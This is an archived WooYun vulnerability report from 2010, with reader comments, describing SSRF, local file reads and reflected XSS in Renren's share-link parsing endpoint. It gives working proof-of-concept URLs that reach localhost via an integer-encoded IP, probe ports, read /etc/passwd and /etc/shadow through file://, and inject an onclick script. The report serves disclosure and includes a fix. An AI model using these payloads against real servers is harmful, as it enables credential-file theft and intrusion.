破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

人人网的分享网页功能存在诸多安全漏洞

编号12
Urlhttp://www.wooyun.org/bug.php?action=view&id=12
漏洞状态厂商已经确认
漏洞标题人人网的分享网页功能存在诸多安全漏洞
漏洞类型任意文件遍历/下载
厂商人人网
白帽子kEvin1986
提交日期2010-07-13 19:22:00
公开日期2010-07-29 19:45:00
修复时间(not set)
确认时间1970-01-01 00:00:00
Confirm Spend-1
漏洞标签第三方不可信程序 Curl类库
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank18
漏洞简介
人人网的分享网页功能存在诸多漏洞. 这些漏洞可导致跨站攻击,任意文件读取,代理攻击和信息泄露等各种安全隐患.
漏洞细节

人人网SNS社区的分享站外连接功能存在严重安全隐患, 其后台调用的Ajax接口为 http://share.renren.com/parse_share.do
向其接口提交参数link=*用于适用人人网服务器读取网络共享信息和视频图片信息等.但是由于底层适用类curl库,而没有正确过滤URL导致可以读取内网诸多信息.
如提交
http://share.renren.com/parse_share.do?link=http://2130706433
可读取127.0.0.1服务器上的信息. 也可做端口探测, 如http://share.renren.com/parse_share.do?link=http://2130706433:8080
原因是因为IP地址127.0.0.1可换算成为 (127*256^3)+(0*256^2)+(0*256)+1=2130706433, 访问2130706433此地址则代表访问127.0.0.1
另由于curl库支持多种协议, 如file://, ftp://, telnet://等, 并且file:// 支持目录读取, 导致服务器文件信息泄露, 可以读取任意的目录和文件.
如提交
http://share.renren.com/parse_share.do?link=file:///etc/passwd
http://share.renren.com/parse_share.do?link=file:///etc/sysconfig/
且由于其服务器运行在root权限上, 权限非常之大, 可读取shadow等内容用于暴力猜解密码.如:
http://share.renren.com/parse_share.do?link=file:///etc/shadow
并且该网页返回的Json信息没有经过HTML值过滤,可用于在Share.renren.com下制造跨站脚本用于攻击
http://share.renren.com/parse_share.do?link=%3Cinput%20onclick=alert('Hola!wooyun!')%3E

POC

http://share.renren.com/parse_share.do?link=%3Cinput%20onclick=alert('Hola!wooyun!')%3E
http://share.renren.com/parse_share.do?link=http://2130706433:8080
http://share.renren.com/parse_share.do?link=file:///etc/shadow

修复方案

对主机地址规则做正确的正则匹配,并且限制访问协议,做HTML输出过滤和降低WEB服务器权限等级.

状态信息 2010-07-13: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-07-29: 细节向公众公开
厂商回复感谢kevin牛大力支持
回应信息危害等级:高漏洞Rank:18 确认时间:2010-07-13 19:22
Showing 1-12 of 12 items.
评论内容评论人点赞数评论时间

乌云第一个精华,挖坟

进击的zjx02015-06-27 22:52:00

同时暴露了开发程序猿的自我修养:)

大物期末不能挂02015-04-27 22:37:00

wooyun第一洞惊现穿越时空去确认漏洞的厂商

大物期末不能挂02015-04-27 22:36:00

程序员精心造了这么个牛洞

白加黑02015-01-26 13:51:00

@px1624 ..........

乐乐、02014-11-17 10:23:00

@乐乐、 下载要点感谢啊~~

px162402014-11-17 09:32:00

T.T 刚看第一个精华就这么屌

乐乐、02014-11-17 09:22:00

@zph 牛逼!

px162402014-11-17 09:18:00

时间倒流啊……

zph02014-08-16 17:25:00

mark

he1renyagao02014-07-02 10:44:00

乌云第一洞,来挖个坟

VIP02013-07-20 12:24:00

1970年亮了……

bombless02013-02-05 12:06:00